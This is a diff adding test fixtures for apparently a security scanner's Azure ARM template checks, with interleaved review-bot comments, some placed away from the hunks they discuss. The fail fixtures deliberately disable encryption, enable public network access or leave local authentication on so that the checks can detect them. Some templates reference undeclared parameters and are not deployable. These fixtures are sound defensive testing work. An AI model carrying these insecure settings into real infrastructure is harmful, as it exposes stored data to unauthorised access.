+ "metadata": {
+ "description": "Location for the Cosmos DB account."
+ }
+ },
+ "defaultConsistencyLevel": {
+ "type": "string",
+ "defaultValue": "Session",
+ "metadata": {
+ "description": "The default consistency level of the Cosmos DB account."
+ },
+ "allowedValues": [
+ "Eventual",
+ "ConsistentPrefix",
+ "Session",
+ "BoundedStaleness",
+ "Strong"
+ ]
+ },
+ "maxStalenessPrefix": {
+ "type": "int",
+ "defaultValue": 100000,
+ "metadata": {
+ "description": "Max stale requests. Required for BoundedStaleness. Valid ranges, Single Region: 10 to 2147483647. Multi Region: 100000 to 2147483647."
+ },
+ "maxValue": 2147483647,
+ "minValue": 10
+ },
+ "maxIntervalInSeconds": {
+ "type": "int",
+ "defaultValue": 300,
+ "metadata": {
+ "description": "Max lag time (minutes). Required for BoundedStaleness. Valid ranges, Single Region: 5 to 84600. Multi Region: 300 to 86400."
+ },
+ "maxValue": 86400,
+ "minValue": 5
+ }
+ },
+ "variables": {
+ "consistencyPolicy": {
+ "Eventual": {
+ "defaultConsistencyLevel": "Eventual"
+ },
+ "ConsistentPrefix": {
+ "defaultConsistencyLevel": "ConsistentPrefix"
+ },
+ "Session": {
+ "defaultConsistencyLevel": "Session"
+ },
+ "BoundedStaleness": {
+ "defaultConsistencyLevel": "BoundedStaleness",
+ "maxStalenessPrefix": "[parameters('maxStalenessPrefix')]",
+ "maxIntervalInSeconds": "[parameters('maxIntervalInSeconds')]"
+ },
+ "Strong": {
+ "defaultConsistencyLevel": "Strong"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2022-05-15",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "kind": "GlobalDocumentDB",
+ "properties": {
+ "disableLocalAuth": true,
+ "databaseAccountOfferType": "Standard",
+ "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+ "locations": [
+ {
+ "locationName": "[parameters('location')]",
+ "failoverPriority": 0,
+ "isZoneRedundant": false
+ }
+ ],
+ "capabilities": [
+ {
+ "name": "EnableServerless"
+ }
+ ]
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/unknown.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/unknown.json
new file mode 100644
index 00000000000..aa514eb8b61
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/unknown.json
@@ -0,0 +1,91 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "metadata": {
+ "_generator": {
+ "name": "bicep",
+ "version": "0.9.1.41621",
+ "templateHash": "17090762923867278967"
+ }
+ },
+ "parameters": {
+ "accountName": {
+ "type": "string",
+ "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+ "metadata": {
+ "description": "Cosmos DB account name, max length 44 characters"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for the Cosmos DB account."
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2022-05-15",
+ "name": "unknown",
+ "location": "[parameters('location')]",
+ "kind": "MongoDB",
+ "properties": {
+ "databaseAccountOfferType": "Standard",
+ "locations": [
+ {
+ "locationName": "[parameters('location')]"
+ }
+ ]
+ }
+ },
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2022-05-15",
+ "name": "unknown",
+ "kind": "MongoDB",
+ "properties": {
+ "databaseAccountOfferType": "Standard",
+ "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+ "locations": [
+ {
+ "locationName": "[parameters('location')]",
+ "failoverPriority": 0,
+ "isZoneRedundant": false
+ }
+ ],
+ "capabilities": [
+ {
+ "name": "EnableServerless"
+ }
+ ],
+ "disableLocalAuth": true
+ }
+ },
+ {
+ "type": "Microsoft.DocumentDB/databaseAccounts",
+ "apiVersion": "2022-05-15",
+ "name": "unknown",
+ "location": "[parameters('location')]",
+ "kind": "MongoDB",
+ "properties": {
+ "databaseAccountOfferType": "Standard",
+ "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+ "locations": [
+ {
+ "locationName": "[parameters('location')]",
+ "failoverPriority": 0,
+ "isZoneRedundant": false
+ }
+ ],
+ "capabilities": [
+ {
+ "name": "EnableServerless"
+ }
+ ],
+ "disableLocalAuth": false
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json
new file mode 100644
index 00000000000..da1b0618d29
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json
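Review bot: All three `Microsoft.DocumentDB/databaseAccounts` resources in unknown.json carry the same `"name": "unknown"`, so if the ARM runner identifies resources by type and name only one of them is actually evaluated and the other two variants (the one without `location`, and the MongoDB kind with `disableLocalAuth: false`) are silently untested; give each a distinct name such as `unknown`, `unknown2`, `unknown3` and list all three in the expected UNKNOWN set. The template also references `variables('consistencyPolicy')` and `parameters('defaultConsistencyLevel')` although it declares neither (its `parameters` block holds only `accountName` and `location` and there is no `variables` block). The hunk starts on the previous line.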
@@ -0,0 +1,186 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "metadata": {
+ "_generator": {
+ "name": "bicep",
+ "version": "0.5.6.12127",
+ "templateHash": "11556612112757819680"
+ }
+ },
+ "parameters": {
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources"
+ }
+ },
+ "clusterName": {
+ "type": "string",
+ "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]",
+ "metadata": {
+ "description": "Name of the cluster"
+ }
+ },
+ "skuName": {
+ "type": "string",
+ "defaultValue": "Standard_D12_v2",
+ "metadata": {
+ "description": "Name of the sku"
+ }
+ },
+ "skuCapacity": {
+ "type": "int",
+ "defaultValue": 2,
+ "maxValue": 1000,
+ "minValue": 2,
+ "metadata": {
+ "description": "# of nodes"
+ }
+ },
+ "databaseName": {
+ "type": "string",
+ "defaultValue": "kustodb",
+ "metadata": {
+ "description": "Name of the database"
+ }
+ },
+ "eventHubNamespaceName": {
+ "type": "string",
+ "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]",
+ "metadata": {
+ "description": "Name of Event Hub's namespace"
+ }
+ },
+ "eventHubName": {
+ "type": "string",
+ "defaultValue": "kustoHub",
+ "metadata": {
+ "description": "Name of Event Hub"
+ }
+ }
+ },
+ "variables": {
+ "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde",
+ "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]",
+ "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]",
+ "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]"
+ },
+ "resources": [
+ {
+ "type": 
"Microsoft.EventHub/namespaces/eventhubs/consumergroups",
+ "apiVersion": "2021-11-01",
+ "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]",
+ "properties": {},
+ "dependsOn": [
+ "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+ ]
+ },
+ {
+ "type": "Microsoft.EventHub/namespaces/eventhubs",
+ "apiVersion": "2021-11-01",
+ "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+ "properties": {
+ "messageRetentionInDays": 2,
+ "partitionCount": 2
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]"
+ ]
+ },
+ {
+ "type": "Microsoft.Kusto/clusters/databases/scripts",
+ "apiVersion": "2022-02-01",
+ "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]",
+ "properties": {
+ "scriptContent": "// Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n// Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n// We modify the ingestion batching policy to make it easy to see records coming ingestion\n// THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION: MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"",
+ "continueOnErrors": false
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]"
+ ]
+ },
+ {
+ "type": "Microsoft.Kusto/clusters/databases/dataConnections",
+ "apiVersion": "2022-02-01",
+ "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]",
+ 
"location": "[parameters('location')]",
+ "kind": "EventHub",
+ "properties": {
+ "compression": "None",
+ "consumerGroup": "kustoConsumerGroup",
+ "dataFormat": "MULTIJSON",
+ "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+ "eventSystemProperties": [
+ "x-opt-enqueued-time"
+ ],
+ "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+ "mappingRuleName": "DirectJson",
+ "tableName": "RawEvents"
+ },
+ "dependsOn": [
+ "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]",
+ "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+ "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]",
+ "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]",
+ "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]"
+ ]
+ },
+ {
+ "type": "Microsoft.Kusto/clusters/databases",
+ "apiVersion": "2022-02-01",
+ "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]",
+ "location": "[parameters('location')]",
+ "kind": "ReadWrite",
+ "dependsOn": [
+ "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]"
+ ]
+ },
+ {
+ "type": "Microsoft.EventHub/namespaces",
+ "apiVersion": "2021-11-01",
+ "name": "[parameters('eventHubNamespaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "capacity": 1,
+ "name": "Standard",
+ "tier": "Standard"
+ },
+ "properties": {}
+ },
+ {
+ "type": "Microsoft.Kusto/clusters",
+ "apiVersion": 
"2022-02-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('skuName')]",
+ "tier": "Standard",
+ "capacity": "[parameters('skuCapacity')]"
+ },
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "enableDiskEncryption":false
+ }
+ },
+ {
+ "type": "Microsoft.Authorization/roleAssignments",
+ "apiVersion": "2021-04-01-preview",
+ "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+ "name": "[variables('roleAssignmentName')]",
+ "properties": {
+ "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster",
+ "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]",
+ "principalType": "ServicePrincipal",
+ "roleDefinitionId": "[variables('fullDataReceiverId')]"
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+ "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+ ]
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json
new file mode 100644
index 00000000000..a86aa7945a7
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json
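Review bot: The only failing fixture sets `"enableDiskEncryption":false` explicitly on the `Microsoft.Kusto/clusters` resource; there is no fixture in which the property is absent from `properties`, which is the shape most real templates have (as far as I know the platform default for this setting is off), so the check's missing-key path is untested. A second fail fixture whose cluster has `"properties": {}` would cover it. The cluster resource is also named `fail` while every other resource in the template derives its name from `parameters('clusterName')`, so the `dependsOn` and `reference(...)` expressions point at a cluster this template never declares; using `"[parameters('clusterName')]"` is not possible for the expected-result lookup, but the mismatch is worth a comment in the test. Minor: the missing space after the colon in `"enableDiskEncryption":false`. This hunk starts on an earlier line.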
@@ -0,0 +1,186 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "11556612112757819680" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources" + } + }, + "clusterName": { + "type": "string", + "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of the cluster" + } + }, + "skuName": { + "type": "string", + "defaultValue": "Standard_D12_v2", + "metadata": { + "description": "Name of the sku" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "maxValue": 1000, + "minValue": 2, + "metadata": { + "description": "# of nodes" + } + }, + "databaseName": { + "type": "string", + "defaultValue": "kustodb", + "metadata": { + "description": "Name of the database" + } + }, + "eventHubNamespaceName": { + "type": "string", + "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of Event Hub's namespace" + } + }, + "eventHubName": { + "type": "string", + "defaultValue": "kustoHub", + "metadata": { + "description": "Name of Event Hub" + } + } + }, + "variables": { + "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde", + "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]", + "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]", + "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]" + }, + "resources": [ + { + "type": 
"Microsoft.EventHub/namespaces/eventhubs/consumergroups", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "properties": {}, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces/eventhubs", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "properties": { + "messageRetentionInDays": 2, + "partitionCount": 2 + }, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/scripts", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]", + "properties": { + "scriptContent": "// Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n// Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n// We modify the ingestion batching policy to make it easy to see records coming ingestion\n// THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION: MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"", + "continueOnErrors": false + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/dataConnections", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]", + 
"location": "[parameters('location')]", + "kind": "EventHub", + "properties": { + "compression": "None", + "consumerGroup": "kustoConsumerGroup", + "dataFormat": "MULTIJSON", + "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "eventSystemProperties": [ + "x-opt-enqueued-time" + ], + "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "mappingRuleName": "DirectJson", + "tableName": "RawEvents" + }, + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]", + "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]", + "location": "[parameters('location')]", + "kind": "ReadWrite", + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces", + "apiVersion": "2021-11-01", + "name": "[parameters('eventHubNamespaceName')]", + "location": "[parameters('location')]", + "sku": { + "capacity": 1, + "name": "Standard", + "tier": "Standard" + }, + "properties": {} + }, + { + "type": "Microsoft.Kusto/clusters", + "apiVersion": 
"2022-02-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('skuName')]",
+ "tier": "Standard",
+ "capacity": "[parameters('skuCapacity')]"
+ },
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "enableDiskEncryption":true
+ }
+ },
+ {
+ "type": "Microsoft.Authorization/roleAssignments",
+ "apiVersion": "2021-04-01-preview",
+ "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+ "name": "[variables('roleAssignmentName')]",
+ "properties": {
+ "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster",
+ "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]",
+ "principalType": "ServicePrincipal",
+ "roleDefinitionId": "[variables('fullDataReceiverId')]"
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+ "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+ ]
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail.json b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail.json
new file mode 100644
index 00000000000..d732f0dc6db
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail.json
@@ -0,0 +1,12 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DataFactory/factories",
+ "apiVersion": "2018-06-01",
+ "name": "fail1",
+ "location": "[resourceGroup().location]"
+ }
+ ]
+}
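Review bot: Neither fixture covers a `Microsoft.Kusto/clusters` resource that omits `enableDiskEncryption`, which is the common real-world shape and, if I recall the service default correctly, deploys with disk encryption off, so the check's result for a missing property is unpinned. A `fail2.json` identical to this template but with `"properties": {}` on the cluster would lock that in, the way `DataFactoryNoPublicNetworkAccess/fail.json` does for an absent `publicNetworkAccess`. Unrelated to the check result: the cluster here is named the literal `pass` while every `dependsOn` and the role assignment's `principalId` expression reference `parameters('clusterName')`, so the template is not deployable as-is; harmless for a static fixture, but worth knowing if it is ever reused as a sample.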
diff --git a/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail2.json b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail2.json
new file mode 100644
index 00000000000..32f6a1e113c
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail2.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DataFactory/factories",
+ "apiVersion": "2018-06-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/pass.json b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/pass.json
new file mode 100644
index 00000000000..5f1ca41b965
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/pass.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DataFactory/factories",
+ "apiVersion": "2018-06-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DataLakeStoreEncryption/fail.json b/tests/arm/checks/resource/example_DataLakeStoreEncryption/fail.json
new file mode 100644
index 00000000000..30df0cfd22e
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataLakeStoreEncryption/fail.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DataLakeStore/accounts",
+ "apiVersion": "2016-11-01",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "encryptionState": "Disabled"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass.json b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass.json
new file mode 100644
index 00000000000..41e61ca2d85
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass.json
@@ -0,0 +1,14 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DataLakeStore/accounts",
+ "apiVersion": "2016-11-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass2.json b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass2.json
new file mode 100644
index 00000000000..b18d516b9ce
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass2.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DataLakeStore/accounts",
+ "apiVersion": "2016-11-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "encryptionState": "Enabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json
new file mode 100644
index 00000000000..b8ca21f4a5b
--- /dev/null
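Review bot: `pass.json` ships an empty `properties` object, so the check treats an absent `encryptionState` as compliant; that is defensible only because Data Lake Store turns on encryption with service-managed keys by default, and that reliance on a platform default should be stated in the check rather than left implicit in a fixture, e.g. `# encryptionState defaults to Enabled service-side, so only an explicit "Disabled" is a finding`. Also worth a line in the check's description: `Microsoft.DataLakeStore/accounts` is the Gen1 service, which Microsoft has announced for retirement, so this check will mostly surface in legacy templates.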
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json @@ -0,0 +1,68 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json new file mode 100644 index 00000000000..04be1022e1e --- /dev/null 
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json @@ -0,0 +1,71 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "prepareEncryption": { + "value": false + }, + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file 
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json new file mode 100644 index 00000000000..ae285e6fc7c --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json 
